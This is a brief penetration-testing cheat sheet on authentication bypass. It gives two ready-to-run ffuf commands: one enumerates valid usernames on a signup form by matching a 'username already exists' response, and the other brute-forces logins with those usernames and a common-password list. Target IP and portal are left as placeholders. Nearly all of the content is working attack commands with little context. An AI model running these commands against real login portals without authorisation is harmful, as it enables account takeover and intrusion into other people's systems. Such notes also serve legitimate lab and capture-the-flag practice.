Authentication Bypassing

Username Enumeratuion

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://[Target IP]/[authentication portal] -mr "username already exists"

Brute Forcing

Save usernames from the user enumeration command to a txt file.

ffuf -w [link to the file of valied usernames]:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://[Tager IP]/[login portal] -fc 200

Last updated